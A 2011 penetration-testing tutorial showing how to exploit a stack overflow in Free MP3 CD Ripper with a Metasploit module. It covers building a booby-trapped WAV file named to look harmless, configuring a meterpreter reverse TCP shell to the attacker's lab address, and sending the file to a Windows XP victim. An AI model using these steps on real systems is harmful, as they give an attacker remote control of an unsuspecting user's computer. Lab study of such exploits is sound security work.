Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5 R 1
Victim O.S : Windows XP SP 3
Vulnerable Application : Free MP3 CD Ripper 18.104.22.168
Exploit Credits : Richard Leahy, X-h4ck, Tiago Henriques
Actually this exploit already featured on exploit-db.com on August in this page http://www.exploit-db.com/exploits/17727/.
This module exploits a stack based buffer overflow found in Free MP3 CD Ripper 1.1. The overflow is triggered when an unsuspecting user opens a malicious WAV file.
But what I will explain in this step by step tutorial by using this exploit as a metasploit module.
1. Free MP3 Ripper 22.214.171.124 (vulnerable application)
2. free mp3 ripper wav exploit (download link)
Attacker IP Address : 192.168.8.90
Victim IP Address : 192.168.8.91
1. Download the required exploit above, and then copy to
cp free_mp3_ripper_wav.rb /pentest/exploits/framework/modules/exploits/windows/fileformat/
2. Open your console(CTRL + ALT + T) and type msfconsole to get in to your metasploit console box.
3. Use the exploit we've just downloaded and set the payload we want to use.
4. The next step after finish set up exploit and payload, we need to set up the available switch on this exploit. (fyi : every exploit and payload has its own switch to configure).
set filename Rock-n-Roll.wav --> give nice name to the vulnerable file set lhost 192.168.8.90 --> attacker ip address set lport 443 --> attacker port(if attack successfully launched, victim will make reverse connection to this port) set target 0 --> Windows XP SP3 exploit --> Generate the vulnerable file my vulnerable file(as you see on picture above) stored on /root/.msf4/local/Rock-n-Roll.wav
5. The next step you need to set up a metasploit handler to handle request from victim if they execute the exploit.
use exploit/multi/handler --> set up the metasploit handler set payload windows/meterpreter/reverse_tcp --> set the payload the same with step 2 set lhost 192.168.8.90 --> set lhost the same with step 4 set lport 443 --> set lport te same with step 4 exploit --> start handler
6. After everything has been set up successfully, for the next step we need to send the malicious file to victim. If you try this tutorial on your own lab, you can follow my previous tutorial about how to easily sharing Backtrack files (view tutorial here).
The picture below was when victim opened malicious WAV file in their Windows XP SP3 computer.
7. As victim open our malicious file, our metasploit console got something interesting in it.
1. While I'm wrote this tutorial(10 Dec 2011) I still didn't find the newer version of this software
2. Use personal firewall to detect inbound and outbound traffic from your computer
Hope you enjoyed 🙂